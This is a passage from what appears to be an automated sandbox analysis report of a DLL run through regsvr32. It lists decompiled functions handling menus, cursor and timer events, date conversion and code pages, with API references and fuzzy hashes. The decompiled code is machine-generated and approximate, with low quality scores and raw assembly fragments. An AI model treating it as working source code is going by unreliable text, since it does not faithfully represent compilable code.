                                                                        • MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,100101C3,00000000,00000000,?,1001AE49,00000000,00000000,00000000,00000000,00000000,00000000,10018E57,10042CCC), ref: 1001C631
                                                                        • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,100101C3,?,00000000,?,1001AE49,00000000,00000000,00000000,00000000,00000000,00000000,10018E57,10042CCC), ref: 1001C6A7
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.441047171.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000002.00000002.441039881.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000002.00000002.441089778.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000002.00000002.441102742.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000002.00000002.441272413.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000002.00000002.441818626.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                        Similarity
                                                                        • API ID: ByteCharMultiWide$CompareErrorInfoLastString
                                                                        • String ID:
                                                                        • API String ID: 1773772771-0
                                                                        • Opcode ID: c77f23d90567df6e736b9aafa9777b77d817b83e23b873e610d66b8219189818
                                                                        • Instruction ID: f9a15a39c5567b5c4af314f3663c8d3c96b15f003a3eabc65cf21064ebdc607f
                                                                        • Opcode Fuzzy Hash: c77f23d90567df6e736b9aafa9777b77d817b83e23b873e610d66b8219189818
                                                                        • Instruction Fuzzy Hash: DCB1897690825EAFDF22CFA4DC95EAE7BF6EF05690F200119F840AA1A1D771D9D0CB50
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 1003210C Relevance: 13.6, APIs: 9, Instructions: 137windowCOMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 72%
                                                                        			E1003210C(intOrPtr __ecx, intOrPtr _a4, intOrPtr _a8, int _a12) {
				intOrPtr _v8;
				intOrPtr _v12;
				int _v16;
				signed int _v32;
				intOrPtr _v36;
				signed int _v40;
				int _v44;
				char _v48;
				void* __ebp;
				int _t59;
				int _t60;
				void* _t61;
				int _t63;
				signed int _t67;
				int _t68;
				void* _t69;
				int _t71;
				intOrPtr _t74;
				int _t75;
				int _t76;
				struct HMENU__* _t88;
				intOrPtr _t90;

				_t74 = __ecx;
				_v8 = __ecx;
				E10029BA4( *((intOrPtr*)(__ecx + 0x1c)));
				if(_a12 == 0) {
					_t90 = _a4;
					if( *((intOrPtr*)(__ecx + 0x7c)) == 0) {
						L3:
						E1001FFB4( &_v48);
						_v36 = _t90;
						if( *((intOrPtr*)(E100373A5() + 0x78)) !=  *(_t90 + 4)) {
							if(GetMenu( *(_t74 + 0x1c)) == 0) {
								L14:
								_t59 = GetMenuItemCount( *(_t90 + 4));
								_v40 = _v40 & 0x00000000;
								_v16 = _t59;
								if(_t59 <= 0) {
									L34:
									L35:
									return _t59;
								}
								do {
									_t60 = GetMenuItemID( *(_t90 + 4), _v40);
									_v44 = _t60;
									if(_t60 == 0) {
										goto L33;
									}
									if(_t60 != 0xffffffff) {
										_v32 = _v32 & 0x00000000;
										if( *((intOrPtr*)(_t74 + 0x50)) == 0 || _t60 >= 0xf000) {
											_t61 = 0;
										} else {
											_t61 = 1;
										}
										_push(_t61);
										L27:
										_push(_t74);
										E1001FFDA( &_v48);
										_t63 = GetMenuItemCount( *(_t90 + 4));
										_t75 = _t63;
										if(_t75 >= _v16) {
											L32:
											_v16 = _t75;
											_t74 = _v8;
											goto L33;
										}
										_v40 = _v40 + _t63 - _v16;
										while(_v40 < _t75) {
											if(GetMenuItemID( *(_t90 + 4), _v40) != _v44) {
												goto L32;
											}
											_v40 = _v40 + 1;
										}
										goto L32;
									}
									_t67 = E1000822C(_t90, _v40);
									_v32 = _t67;
									if(_t67 == 0) {
										goto L33;
									}
									_t68 = GetMenuItemID( *(_t67 + 4), 0);
									_v44 = _t68;
									if(_t68 != 0 && _t68 != 0xffffffff) {
										_push(0);
										goto L27;
									}
									L33:
									_v40 = _v40 + 1;
									_t59 = _v40;
								} while (_t59 < _v16);
								goto L34;
							}
							_t69 = E10023092(_t74);
							if(_t69 == 0) {
								goto L14;
							}
							_t88 = GetMenu( *(_t69 + 0x1c));
							if(_t88 == 0) {
								goto L14;
							}
							_t71 = GetMenuItemCount(_t88);
							_t76 = 0;
							_a12 = _t71;
							if(_t71 <= 0) {
								L13:
								_t74 = _v8;
								goto L14;
							}
							while(GetSubMenu(_t88, _t76) !=  *(_t90 + 4)) {
								_t76 = _t76 + 1;
								if(_t76 < _a12) {
									continue;
								}
								goto L13;
							}
							_push(_t88);
							_v12 = E10026280();
							goto L13;
						}
						_v12 = _t90;
						goto L14;
					}
					_push(0);
					_push(_a8);
					_push(_t90);
					_t59 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(__ecx + 0x7c)))) + 0x74))();
					if(0 != 0) {
						goto L35;
					}
					goto L3;
				}
				return 0;
			}

























                                                                        0x10032113
                                                                        0x10032118
                                                                        0x1003211b
                                                                        0x10032125
                                                                        0x1003212f
                                                                        0x10032132
                                                                        0x10032149
                                                                        0x1003214d
                                                                        0x10032152
                                                                        0x10032160
                                                                        0x10032174
                                                                        0x100321bd
                                                                        0x100321c0
                                                                        0x100321c6
                                                                        0x100321cc
                                                                        0x100321cf
                                                                        0x1003227f
                                                                        0x10032280
                                                                        0x00000000
                                                                        0x10032280
                                                                        0x100321db
                                                                        0x100321e1
                                                                        0x100321e5
                                                                        0x100321e8
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x100321f1
                                                                        0x1003221b
                                                                        0x10032223
                                                                        0x10032231
                                                                        0x1003222c
                                                                        0x1003222e
                                                                        0x1003222e
                                                                        0x10032233
                                                                        0x10032234
                                                                        0x10032237
                                                                        0x10032238
                                                                        0x10032240
                                                                        0x10032246
                                                                        0x1003224b
                                                                        0x1003226a
                                                                        0x1003226a
                                                                        0x1003226d
                                                                        0x00000000
                                                                        0x1003226d
                                                                        0x10032250
                                                                        0x10032265
                                                                        0x10032260
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x10032262
                                                                        0x10032262
                                                                        0x00000000
                                                                        0x10032265
                                                                        0x100321f8
                                                                        0x100321ff
                                                                        0x10032202
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x10032209
                                                                        0x1003220d
                                                                        0x10032210
                                                                        0x10032217
                                                                        0x00000000
                                                                        0x10032217
                                                                        0x10032270
                                                                        0x10032270
                                                                        0x10032273
                                                                        0x10032276
                                                                        0x00000000
                                                                        0x100321db
                                                                        0x10032178
                                                                        0x1003217f
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x10032186
                                                                        0x1003218a
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x1003218d
                                                                        0x10032193
                                                                        0x10032197
                                                                        0x1003219a
                                                                        0x100321ba
                                                                        0x100321ba
                                                                        0x00000000
                                                                        0x100321ba
                                                                        0x1003219c
                                                                        0x100321a9
                                                                        0x100321ad
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x100321af
                                                                        0x100321b1
                                                                        0x100321b7
                                                                        0x00000000
                                                                        0x100321b7
                                                                        0x10032162
                                                                        0x00000000
                                                                        0x10032162
                                                                        0x10032139
                                                                        0x1003213a
                                                                        0x1003213d
                                                                        0x1003213e
                                                                        0x10032143
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x10032143
                                                                        0x10032283

                                                                        APIs
                                                                          • Part of subcall function 10029BA4: GetFocus.USER32 ref: 10029BA5
                                                                          • Part of subcall function 10029BA4: GetParent.USER32(00000000), ref: 10029BCE
                                                                          • Part of subcall function 10029BA4: GetWindowLongA.USER32 ref: 10029BE9
                                                                          • Part of subcall function 10029BA4: GetParent.USER32(10032120), ref: 10029BF7
                                                                          • Part of subcall function 10029BA4: GetDesktopWindow.USER32 ref: 10029BFB
                                                                          • Part of subcall function 10029BA4: SendMessageA.USER32 ref: 10029C0F
                                                                        • GetMenu.USER32(?), ref: 10032170
                                                                        • GetMenu.USER32(?), ref: 10032184
                                                                        • GetMenuItemCount.USER32 ref: 1003218D
                                                                        • GetSubMenu.USER32 ref: 1003219E
                                                                        • GetMenuItemCount.USER32 ref: 100321C0
                                                                        • GetMenuItemID.USER32(?,00000000), ref: 100321E1
                                                                        • GetMenuItemID.USER32(?,00000000), ref: 10032209
                                                                        • GetMenuItemCount.USER32 ref: 10032240
                                                                        • GetMenuItemID.USER32(?,00000000), ref: 1003225B
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.441047171.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000002.00000002.441039881.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000002.00000002.441089778.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000002.00000002.441102742.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000002.00000002.441272413.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000002.00000002.441818626.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                        Similarity
                                                                        • API ID: Menu$Item$Count$ParentWindow$DesktopFocusLongMessageSend
                                                                        • String ID:
                                                                        • API String ID: 4186786570-0
                                                                        • Opcode ID: 9b251247e75d24311a4f30fcd34c0b76c3a2b708c8d64061887fd89411845d20
                                                                        • Instruction ID: b99619ff26336beedcb7e2a7f55a8e8b58b7034f18844737f90654ad770cd7ca
                                                                        • Opcode Fuzzy Hash: 9b251247e75d24311a4f30fcd34c0b76c3a2b708c8d64061887fd89411845d20
                                                                        • Instruction Fuzzy Hash: 19415931900209AFDF42DFA4CE84AAEB7F5FF08792F214569E911EA152D731EE41DB60
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 1002F502 Relevance: 13.6, APIs: 9, Instructions: 127timekeyboardCOMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 97%
                                                                        			E1002F502(intOrPtr* __ecx, intOrPtr _a4) {
				signed int _v8;
				intOrPtr _v12;
				struct tagPOINT _v20;
				void* __ebp;
				short _t42;
				signed int _t49;
				struct HWND__* _t60;
				intOrPtr _t63;
				intOrPtr _t66;
				void* _t68;
				void* _t71;
				void* _t74;
				intOrPtr _t83;
				void* _t84;
				intOrPtr _t85;
				struct HWND__* _t87;
				intOrPtr _t88;
				intOrPtr* _t89;
				void* _t90;

				_t89 = __ecx;
				_t42 = GetKeyState(1);
				if(_t42 < 0) {
					return _t42;
				}
				_t85 = E100373DB();
				_v12 = _t85;
				GetCursorPos( &_v20);
				ScreenToClient( *(_t89 + 0x1c),  &_v20);
				_t49 =  *((intOrPtr*)( *_t89 + 0x6c))(_v20.x, _v20.y, 0, _t84, _t71);
				_v8 = _t49;
				if(_t49 < 0) {
					 *(_t85 + 0x78) =  *(_t85 + 0x78) | 0xffffffff;
				} else {
					_t74 = E10023092(_t89);
					if(E100230BA() == 0 || E100203CE(_t74) == 0) {
						_v8 = _v8 | 0xffffffff;
					}
					_t66 =  *((intOrPtr*)(_t85 + 0x3c));
					if(_t66 != 0) {
						_t88 =  *((intOrPtr*)(_t66 + 0x1c));
					} else {
						_t88 = 0;
					}
					_t68 = E100220EE(_t90, GetCapture());
					if(_t68 != _t89) {
						if(_t68 != 0) {
							_t83 =  *((intOrPtr*)(_t68 + 0x1c));
						} else {
							_t83 = 0;
						}
						if(_t83 != _t88 && E10023092(_t68) == _t74) {
							_v8 = _v8 | 0xffffffff;
						}
					}
				}
				if(_v8 < 0) {
					L25:
					if( *(_v12 + 0x78) == 0xffffffff) {
						KillTimer( *(_t89 + 0x1c), 0xe001);
					}
					 *((intOrPtr*)( *_t89 + 0x160))(0xffffffff);
					goto L28;
				} else {
					ClientToScreen( *(_t89 + 0x1c),  &_v20);
					_push(_v20.y);
					_t87 = WindowFromPoint(_v20);
					if(_t87 == 0) {
						L23:
						_t59 = _v12;
						_v8 = _v8 | 0xffffffff;
						 *(_t59 + 0x78) =  *(_v12 + 0x78) | 0xffffffff;
						L24:
						if(_v8 >= 0) {
							L28:
							_t53 = 0xe000;
							if(_a4 == 0xe000) {
								_t53 = KillTimer( *(_t89 + 0x1c), 0xe000);
								if(_v8 >= 0) {
									_t53 =  *((intOrPtr*)( *_t89 + 0x160))(_v8);
								}
							}
							return _t53;
						}
						goto L25;
					}
					_t60 =  *(_t89 + 0x1c);
					if(_t87 == _t60 || IsChild(_t60, _t87) != 0) {
						goto L24;
					} else {
						_t63 =  *((intOrPtr*)(_v12 + 0x3c));
						if(_t63 != 0) {
							_t63 =  *((intOrPtr*)(_t63 + 0x1c));
						}
						if(_t63 == _t87) {
							goto L24;
						} else {
							goto L23;
						}
					}
				}
			}






















                                                                        0x1002f50b
                                                                        0x1002f50d
                                                                        0x1002f516
                                                                        0x1002f660
                                                                        0x1002f660
                                                                        0x1002f523
                                                                        0x1002f529
                                                                        0x1002f52c
                                                                        0x1002f539
                                                                        0x1002f54b
                                                                        0x1002f550
                                                                        0x1002f553
                                                                        0x1002f5b6
                                                                        0x1002f555
                                                                        0x1002f55e
                                                                        0x1002f567
                                                                        0x1002f574
                                                                        0x1002f574
                                                                        0x1002f578
                                                                        0x1002f57d
                                                                        0x1002f583
                                                                        0x1002f57f
                                                                        0x1002f57f
                                                                        0x1002f57f
                                                                        0x1002f58d
                                                                        0x1002f594
                                                                        0x1002f598
                                                                        0x1002f59e
                                                                        0x1002f59a
                                                                        0x1002f59a
                                                                        0x1002f59a
                                                                        0x1002f5a3
                                                                        0x1002f5b0
                                                                        0x1002f5b0
                                                                        0x1002f5a3
                                                                        0x1002f594
                                                                        0x1002f5c4
                                                                        0x1002f61a
                                                                        0x1002f621
                                                                        0x1002f62b
                                                                        0x1002f62b
                                                                        0x1002f633
                                                                        0x00000000
                                                                        0x1002f5c6
                                                                        0x1002f5cd
                                                                        0x1002f5d3
                                                                        0x1002f5df
                                                                        0x1002f5e3
                                                                        0x1002f609
                                                                        0x1002f609
                                                                        0x1002f60c
                                                                        0x1002f610
                                                                        0x1002f614
                                                                        0x1002f618
                                                                        0x1002f639
                                                                        0x1002f639
                                                                        0x1002f641
                                                                        0x1002f647
                                                                        0x1002f64d
                                                                        0x1002f656
                                                                        0x1002f656
                                                                        0x1002f64d
                                                                        0x00000000
                                                                        0x1002f65d
                                                                        0x00000000
                                                                        0x1002f618
                                                                        0x1002f5e5
                                                                        0x1002f5ea
                                                                        0x00000000
                                                                        0x1002f5f8
                                                                        0x1002f5fb
                                                                        0x1002f600
                                                                        0x1002f602
                                                                        0x1002f602
                                                                        0x1002f607
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x1002f607
                                                                        0x1002f5ea

                                                                        APIs
                                                                        • GetKeyState.USER32 ref: 1002F50D
                                                                        • GetCursorPos.USER32(?), ref: 1002F52C
                                                                        • ScreenToClient.USER32 ref: 1002F539
                                                                        • GetCapture.USER32 ref: 1002F586
                                                                          • Part of subcall function 100203CE: IsWindowEnabled.USER32(?), ref: 100203D7
                                                                        • ClientToScreen.USER32(?,?), ref: 1002F5CD
                                                                        • WindowFromPoint.USER32(?,?), ref: 1002F5D9
                                                                        • IsChild.USER32 ref: 1002F5EE
                                                                        • KillTimer.USER32(?,0000E001), ref: 1002F62B
                                                                        • KillTimer.USER32(?,0000E000), ref: 1002F647
                                                                          • Part of subcall function 100230BA: GetLastActivePopup.USER32(?), ref: 100230C3
                                                                          • Part of subcall function 100230BA: GetForegroundWindow.USER32(00000000,?,1002F565), ref: 100230D1
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.441047171.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000002.00000002.441039881.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000002.00000002.441089778.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000002.00000002.441102742.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000002.00000002.441272413.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000002.00000002.441818626.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                        Similarity
                                                                        • API ID: Window$ClientKillScreenTimer$ActiveCaptureChildCursorEnabledForegroundFromLastPointPopupState
                                                                        • String ID:
                                                                        • API String ID: 1383385731-0
                                                                        • Opcode ID: cdf1f45528dd1ab4359947715924eeaa346914062a2f9e1f4d0b7eb2bc272758
                                                                        • Instruction ID: 10a8f74c3fcc8b415ddf3c509ebc5c8d81e0882429dab4cfcda73db0c152bb91
                                                                        • Opcode Fuzzy Hash: cdf1f45528dd1ab4359947715924eeaa346914062a2f9e1f4d0b7eb2bc272758
                                                                        • Instruction Fuzzy Hash: 1741AE31600619DFDB11DF65EC88A6E7BF6FF443A4FA18669E511D72A2DB30DE418B00
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 1001328A Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 227COMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 69%
                                                                        			E1001328A(void* __eax, signed int __edx, intOrPtr _a4) {
				signed int _v8;
				signed int _v12;
				char _v16;
				signed int _v20;
				intOrPtr _v24;
				signed int _v28;
				intOrPtr _v32;
				void* __esi;
				void* __ebp;
				char _t72;
				signed int _t74;
				void* _t86;
				void* _t88;
				void* _t90;
				void* _t92;
				void* _t95;
				void* _t98;
				void* _t101;
				void* _t105;
				intOrPtr _t109;
				intOrPtr _t111;
				void* _t123;
				signed int _t124;
				signed int _t125;
				void* _t127;
				signed int _t133;
				signed int _t138;
				signed int _t139;
				void* _t141;
				signed int _t145;
				signed int _t150;
				signed int _t154;
				signed int _t156;
				signed int _t161;
				signed int _t163;
				void* _t171;

				_t138 = __edx;
				_t141 = __eax;
				_t72 =  *((intOrPtr*)(__eax + 0x14));
				asm("cdq");
				_t154 = __edx;
				_v16 = _t72;
				_v12 = __edx;
				if(_t154 < 0 || _t154 <= 0 && _t72 < 0x45) {
					L30:
					_t139 = _t138 | 0xffffffff;
					__eflags = _t139;
					return _t139;
				} else {
					_t156 = _v12;
					if(_t156 > 0 || _t156 >= 0 && _v16 > 0x44c) {
						goto L30;
					} else {
						_t74 =  *(_t141 + 0x10);
						if(_t74 < 0 || _t74 > 0xb) {
							asm("cdq");
							_t124 = 0xc;
							_t138 = _t74 % _t124;
							_t125 = _t138;
							asm("cdq");
							_v16 = _v16 + _t74 / _t124;
							 *(_t141 + 0x10) = _t125;
							asm("adc [ebp-0x8], edx");
							if(_t125 < 0) {
								_v16 = _v16 + 0xffffffff;
								 *(_t141 + 0x10) = _t125 + 0xc;
								asm("adc dword [ebp-0x8], 0xffffffff");
							}
							_t161 = _v12;
							if(_t161 < 0 || _t161 <= 0 && _v16 < 0x45) {
								goto L30;
							} else {
								_t163 = _v12;
								if(_t163 > 0 || _t163 >= 0 && _v16 > 0x44c) {
									goto L30;
								} else {
									goto L16;
								}
							}
						} else {
							L16:
							_t145 =  *(_t141 + 0x10);
							asm("cdq");
							_v24 =  *((intOrPtr*)(0x1004cecc + _t145 * 4));
							_v20 = _t138;
							if((E10019490(_v16, _v12, 4, 0) | _t138) != 0 || (E10019490(_v16, _v12, 0x64, 0) | _t138) == 0) {
								asm("adc ecx, 0x0");
								if((E10019490(_v16 + 0x76c, _v12, 0x190, 0) | _t138) != 0) {
									goto L21;
								}
								goto L19;
							} else {
								L19:
								if(_t145 > 1) {
									_v24 = _v24 + 1;
									asm("adc dword [ebp-0x10], 0x0");
								}
								L21:
								_t138 = _v12;
								_t127 = 0;
								_t147 = _v16 - 1;
								asm("sbb eax, ecx");
								_v28 = _v12;
								asm("adc edx, ecx");
								_v32 = _v16 - 1;
								_t86 = E10013780(_v16 + 0x12b, _t138, 0x190, _t127);
								asm("cdq");
								asm("adc ecx, edx");
								_v8 = _t138;
								_t88 = E10013780(_v16 - 1, _v28, 0x64, 0);
								asm("sbb eax, edx");
								_t90 = E10013780(_t147, _v28, 4, 0);
								asm("adc eax, edx");
								_t92 = E100122A0(_v16, _v12, 0x16d, 0);
								asm("adc eax, edx");
								asm("adc eax, [ebp-0x10]");
								_v8 = _t86 +  *((intOrPtr*)(_t141 + 0xc)) - _t88 + _t90 + _t92 + _v24 - 0x63df;
								_t123 = 0;
								asm("sbb eax, ebx");
								_t95 = E100122A0(_v8, _v8, 0x18, _t123);
								asm("cdq");
								asm("adc edx, esi");
								_t98 = E100122A0( *((intOrPtr*)(_t141 + 8)) + _t95, _t138, 0x3c, _t123);
								asm("cdq");
								asm("adc edx, esi");
								_t101 = E100122A0( *((intOrPtr*)(_t141 + 4)) + _t98, _t138, 0x3c, _t123);
								_t131 = _t101;
								_t150 = _t138;
								asm("cdq");
								asm("adc edx, esi");
								_t169 = _a4 - _t123;
								_v16 =  *_t141 + _t101;
								_v12 = _t138;
								if(_a4 == _t123) {
									_t105 = E10018BEF( &_v16);
									L28:
									if(_t105 == _t123) {
										goto L30;
									}
									L29:
									_t133 = 9;
									return memcpy(_t141, _t105, _t133 << 2);
								}
								E100193FB(_t150, _t169);
								_t109 =  *0x1004cde8; // 0x7080
								asm("cdq");
								_v16 = _v16 + _t109;
								asm("adc [ebp-0x8], edx");
								_t105 = E100134E7(_t131, _t138,  &_v16);
								if(_t105 == _t123) {
									goto L30;
								}
								_t136 =  *((intOrPtr*)(_t141 + 0x20));
								_t171 =  *((intOrPtr*)(_t141 + 0x20)) - _t123;
								if(_t171 > 0 || _t171 < 0 &&  *((intOrPtr*)(_t105 + 0x20)) > _t123) {
									_t111 =  *0x1004cdf0; // 0xfffff1f0
									asm("cdq");
									_v16 = _v16 + _t111;
									asm("adc [ebp-0x8], edx");
									_t105 = E100134E7(_t136, _t138,  &_v16);
									goto L28;
								} else {
									goto L29;
								}
							}
						}
					}
				}
			}







































                                                                        0x1001328a
                                                                        0x10013293
                                                                        0x10013295
                                                                        0x10013298
                                                                        0x10013299
                                                                        0x1001329b
                                                                        0x1001329e
                                                                        0x100132a1
                                                                        0x100134d0
                                                                        0x100134d0
                                                                        0x100134d0
                                                                        0x00000000
                                                                        0x100132b2
                                                                        0x100132b2
                                                                        0x100132b6
                                                                        0x00000000
                                                                        0x100132cc
                                                                        0x100132cc
                                                                        0x100132d1
                                                                        0x100132d8
                                                                        0x100132db
                                                                        0x100132dc
                                                                        0x100132de
                                                                        0x100132e0
                                                                        0x100132e1
                                                                        0x100132e4
                                                                        0x100132e7
                                                                        0x100132ec
                                                                        0x100132f1
                                                                        0x100132f5
                                                                        0x100132f8
                                                                        0x100132f8
                                                                        0x100132fc
                                                                        0x10013300
                                                                        0x00000000
                                                                        0x10013312
                                                                        0x10013312
                                                                        0x10013316
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x10013316
                                                                        0x10013327
                                                                        0x10013327
                                                                        0x10013327
                                                                        0x10013338
                                                                        0x1001333c
                                                                        0x1001333f
                                                                        0x1001334e
                                                                        0x10013371
                                                                        0x1001337d
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x1001337f
                                                                        0x1001337f
                                                                        0x10013382
                                                                        0x10013384
                                                                        0x10013388
                                                                        0x10013388
                                                                        0x1001338c
                                                                        0x10013392
                                                                        0x10013397
                                                                        0x10013398
                                                                        0x1001339b
                                                                        0x1001339d
                                                                        0x100133aa
                                                                        0x100133ae
                                                                        0x100133b1
                                                                        0x100133bf
                                                                        0x100133c7
                                                                        0x100133ca
                                                                        0x100133cd
                                                                        0x100133de
                                                                        0x100133e4
                                                                        0x100133fb
                                                                        0x10013400
                                                                        0x1001340a
                                                                        0x10013411
                                                                        0x1001341a
                                                                        0x1001341d
                                                                        0x1001341f
                                                                        0x10013428
                                                                        0x10013434
                                                                        0x1001343a
                                                                        0x1001343e
                                                                        0x1001344a
                                                                        0x1001344d
                                                                        0x10013454
                                                                        0x10013459
                                                                        0x1001345d
                                                                        0x1001345f
                                                                        0x10013462
                                                                        0x10013464
                                                                        0x10013467
                                                                        0x1001346a
                                                                        0x1001346d
                                                                        0x100134b7
                                                                        0x100134bc
                                                                        0x100134bf
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x100134c1
                                                                        0x100134cb
                                                                        0x00000000
                                                                        0x100134cc
                                                                        0x1001346f
                                                                        0x10013474
                                                                        0x10013479
                                                                        0x1001347a
                                                                        0x10013481
                                                                        0x10013484
                                                                        0x1001348c
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x1001348e
                                                                        0x10013491
                                                                        0x10013493
                                                                        0x1001349c
                                                                        0x100134a1
                                                                        0x100134a2
                                                                        0x100134a9
                                                                        0x100134ac
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x10013493
                                                                        0x1001334e
                                                                        0x100132d1
                                                                        0x100132b6

                                                                        APIs
                                                                        • __allrem.LIBCMT ref: 10013342
                                                                        • __allrem.LIBCMT ref: 1001335A
                                                                        • __allrem.LIBCMT ref: 10013376
                                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 100133B1
                                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 100133CD
                                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 100133E4
                                                                          • Part of subcall function 100193FB: __lock.LIBCMT ref: 10019413
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.441047171.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000002.00000002.441039881.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000002.00000002.441089778.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000002.00000002.441102742.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000002.00000002.441272413.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000002.00000002.441818626.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                        Similarity
                                                                        • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@$__lock
                                                                        • String ID: E
                                                                        • API String ID: 4106114094-3568589458
                                                                        • Opcode ID: 06da0e30a64430f250144378af185fd51bc4e0d870f8f0e71d8fa3d16068f5cb
                                                                        • Instruction ID: 8c17dd76723e682d1ec04a20f3335422bd29dcdf082c608cde21ea215b529c0d
                                                                        • Opcode Fuzzy Hash: 06da0e30a64430f250144378af185fd51bc4e0d870f8f0e71d8fa3d16068f5cb
                                                                        • Instruction Fuzzy Hash: 90716CB5E00219BFEB55DEE8CC81B9EB7B5EB44324F14C1A9E514EB281D774EA808B50
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 1001A487 Relevance: 12.2, APIs: 8, Instructions: 169COMMONLIBRARYCODE
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 86%
                                                                        			E1001A487(void* __ebx, void* __edi, int __esi, void* __eflags) {
				intOrPtr _t54;
				int _t56;
				char* _t57;
				int _t68;
				char* _t69;
				int _t70;
				int _t73;
				void* _t77;
				int _t81;
				short* _t82;
				void* _t97;
				short* _t98;

				_t94 = __esi;
				_push(0x38);
				_push(0x10042f10);
				E10012514(__ebx, __edi, __esi);
				_t54 =  *0x1004c470; // 0x303bb91f
				 *((intOrPtr*)(_t97 - 0x1c)) = _t54;
				 *(_t97 - 0x34) = 0;
				 *(_t97 - 0x44) = 0;
				_t81 =  *( *(_t97 + 0x14));
				 *(_t97 - 0x40) = _t81;
				 *(_t97 - 0x3c) = 0;
				_t56 =  *(_t97 + 8);
				if(_t56 ==  *(_t97 + 0xc)) {
					_t82 =  *(_t97 - 0x48);
					goto L31;
				} else {
					_t85 = _t97 - 0x30;
					if(GetCPInfo(_t56, _t97 - 0x30) != 0 &&  *(_t97 - 0x30) == 1 && GetCPInfo( *(_t97 + 0xc), _t97 - 0x30) != 0 &&  *(_t97 - 0x30) == 1) {
						 *(_t97 - 0x3c) = 1;
					}
					if( *(_t97 - 0x3c) == 0) {
						_t94 =  *(_t97 - 0x38);
					} else {
						if(_t81 == 0xffffffff) {
							_t77 = E10011820( *(_t97 + 0x10));
							_pop(_t85);
							_t94 = _t77 + 1;
							__eflags = _t94;
						} else {
							_t94 = _t81;
						}
						 *(_t97 - 0x38) = _t94;
					}
					if( *(_t97 - 0x3c) != 0) {
						L14:
						 *(_t97 - 4) = 0;
						E10010B20(_t94 + _t94 + 0x00000003 & 0xfffffffc, _t85);
						 *(_t97 - 0x18) = _t98;
						_t82 = _t98;
						 *(_t97 - 0x48) = _t82;
						E10011C50(_t82, 0, _t94 + _t94);
